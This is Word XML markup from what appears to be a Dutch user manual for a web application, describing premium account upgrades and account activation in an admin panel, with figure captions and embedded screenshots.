                <wp:effectExtent l="0" t="0" r="38100" b="2032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6228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E2204E" w:rsidRDefault="00E2204E"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204" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-11.85pt;margin-top:166.3pt;width:215pt;height:36.4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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E1DD0B3" w14:textId="2AF5C527" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="001250BF">
                      <w:r>
                        <w:t xml:space="preserve">De gebruiker kan door contact op te nemen met S5 zijn account upgraden naar Premiumaccount. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC72974" w14:textId="54BACA16" w:rsidR="001250BF" w:rsidRDefault="001250BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728DFE96" w14:textId="2491B4DE" w:rsidR="001250BF" w:rsidRDefault="0043602E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253067264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3684D649" wp14:editId="7F1302A3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-154305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>350520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2735580" cy="1602740"/>
                <wp:effectExtent l="0" t="0" r="33020" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="744" name="Text Box 744"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2735580" cy="16027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5A040C" w14:textId="08E53EE8" w:rsidR="00E2204E" w:rsidRPr="00325408" w:rsidRDefault="00E2204E">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D649" id="Text Box 744" o:spid="_x0000_s1205" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-12.15pt;margin-top:27.6pt;width:215.4pt;height:126.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="055A040C" w14:textId="08E53EE8" w:rsidR="00E2204E" w:rsidRPr="00325408" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6CAA37" w14:textId="217BC718" w:rsidR="001250BF" w:rsidRDefault="00FF4610">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253214720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71CC84FF" wp14:editId="01DCCA9B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3023235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>50165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="803" name="Text Box 80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C57D7" w14:textId="0E5556FB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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C84FF" id="Text Box 803" o:spid="_x0000_s1206" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:238.05pt;margin-top:3.95pt;width:85pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2D4C57D7" w14:textId="0E5556FB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.4</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00916499">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253064192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50D9806F" wp14:editId="2E73C29F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3086735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>395605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3383915" cy="2399665"/>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emiumaccount.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3383915" cy="2399665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCAE534" w14:textId="5C4F24F8" w:rsidR="001250BF" w:rsidRDefault="00916499">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253066240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A80D032" wp14:editId="05D1716A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3087370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2596515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3364230" cy="2418080"/>
            <wp:effectExtent l="0" t="0" r="0"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lijst met report type.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3364230" cy="2418080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3FC8A" w14:textId="448ED701" w:rsidR="00A958DB" w:rsidRDefault="00A958DB" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743A7DD3" w14:textId="3E8A5EA4" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC9ADA1" w14:textId="2126CDA9" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0016C82B" w14:textId="13F2554A" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0509C276" w14:textId="118D9419" w:rsidR="007E550D" w:rsidRDefault="0043602E" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253215744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F772C5D" wp14:editId="44FCB7BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1244600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>231140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1642745" cy="737870"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="804" name="Text Box 804"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1642745" cy="737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9288E" w14:textId="1A85E70B" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0043602E">
                            <w:pPr>
                              <w:ind w:left="708" w:firstLine="708"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 5.5</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E21CAF1" w14:textId="76B193B6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0043602E">
                            <w:r>
                              <w:t>Figuur 5.7</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>Figuu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2C5D" id="Text Box 804" o:spid="_x0000_s1207" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:18.2pt;width:129.35pt;height:58.1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6179288E" w14:textId="1A85E70B" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0043602E">
                      <w:pPr>
                        <w:ind w:left="708" w:firstLine="708"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 5.5</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E21CAF1" w14:textId="76B193B6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0043602E">
                      <w:r>
                        <w:t>Figuur 5.7</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>Figuur 5.6</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00916499">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253065216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AF6088B" wp14:editId="3888A837">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-342900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1075055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3241040" cy="2417445"/>
            <wp:effectExtent l="0" t="0" r="1016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lijst met scan type.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3241040" cy="2417445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC28B4" w14:textId="77777777" w:rsidR="007E550D" w:rsidRDefault="007E550D" w:rsidP="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:sectPr w:rsidR="007E550D" w:rsidSect="00D41025">
          <w:headerReference w:type="default" r:id="rId91"/>
          <w:headerReference w:type="first" r:id="rId92"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720C5FC8" w14:textId="1B0AA9F4" w:rsidR="00CB6C6E" w:rsidRDefault="00045A48" w:rsidP="005C4EAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253069312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43FC027F" wp14:editId="1CD083BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-918173</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1135529</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="750" name="Rectangle 7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1F38D" id="Rectangle 750" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.3pt;margin-top:-89.35pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00557C84">
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00AB1EE1">
        <w:t>Admin Paneel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716628BD" w14:textId="77777777" w:rsidR="003F7243" w:rsidRDefault="003F7243" w:rsidP="00311403"/>
    <w:p w14:paraId="7735C821" w14:textId="6F67D60F" w:rsidR="003F7243" w:rsidRDefault="003F7243" w:rsidP="00562D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Account Activatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F8903" w14:textId="1D809342" w:rsidR="00311403" w:rsidRPr="0043602E" w:rsidRDefault="0043602E" w:rsidP="00311403">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253217792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="689E1095" wp14:editId="4CC88BD7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5693410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5751195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="762000" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="807" name="Text Box 807"/>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DA4F0" w14:textId="7C29A66C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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1095" id="Text Box 807" o:spid="_x0000_s1208" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:448.3pt;margin-top:452.85pt;width:60pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17CDA4F0" w14:textId="7C29A66C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.9</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253216768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61A8D01D" wp14:editId="71E76724">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5626735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1633855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="806" name="Text Box 806"/>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BEECD" w14:textId="6A6E1BFB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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8D01D" id="Text Box 806" o:spid="_x0000_s1209" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:443.05pt;margin-top:128.65pt;width:65pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7CDBEECD" w14:textId="6A6E1BFB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.8</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253046784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CE1F3C2" wp14:editId="665CF5C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4423410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7005955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="883920" cy="907415"/>
            <wp:effectExtent l="25400" t="25400" r="30480" b="3238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remium active.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="883920" cy="9074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5760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B44B1F5" wp14:editId="220B41AA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-213360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6433185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5839460" cy="1712595"/>
                <wp:effectExtent l="0" t="0" r="27940" b="14605"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="722" name="Text Box 722"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5839460" cy="171259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1DDF4D4" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00311403">
                            <w:r>
                              <w:t xml:space="preserve">Na de betaling activeert de administrator het premiumaccount door op de knop “inactive” te drukken. Er verschijnt een bevestiging pop-up, de administrator klikt op “Activeer account” om het premium account te acti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B1F5" id="Text Box 722" o:spid="_x0000_s1210" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16.8pt;margin-top:506.55pt;width:459.8pt;height:134.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="71DDF4D4" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00311403">
                      <w:r>
                        <w:t xml:space="preserve">Na de betaling activeert de administrator het premiumaccount door op de knop “inactive” te drukken. Er verschijnt een bevestiging pop-up, de administrator klikt op “Activeer account” om het premium account te activeren.   </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253044736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BB03C5A" wp14:editId="684556A9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-213360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3351530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5839460" cy="2922270"/>
            <wp:effectExtent l="25400" t="25400" r="27940" b="2413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ctiveer customer.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5839460" cy="2922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3712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B618079" wp14:editId="7AF90750">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-210820</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2211070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="949960"/>
                <wp:effectExtent l="0" t="0" r="25400" b="15240"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="683" name="Text Box 683"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="9499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B2CFE3" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00656882" w:rsidRDefault="00E2204E"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8079" id="Text Box 683" o:spid="_x0000_s1211" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16.6pt;margin-top:174.1pt;width:460pt;height:74.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="07B2CFE3" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00656882" w:rsidRDefault="00E2204E"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253042688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24AAFC45" wp14:editId="1081BA6E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-218440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1847215"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="3238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customer inactief.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18472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868CB5E" w14:textId="23D67159" w:rsidR="004D0768" w:rsidRDefault="004D0768" w:rsidP="004D0768"/>
    <w:p w14:paraId="033E4126" w14:textId="03F8586D" w:rsidR="004D0768" w:rsidRDefault="00930607" w:rsidP="004D0768">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253077504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F05B9EC" wp14:editId="31966F20">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-915222</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-912794</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
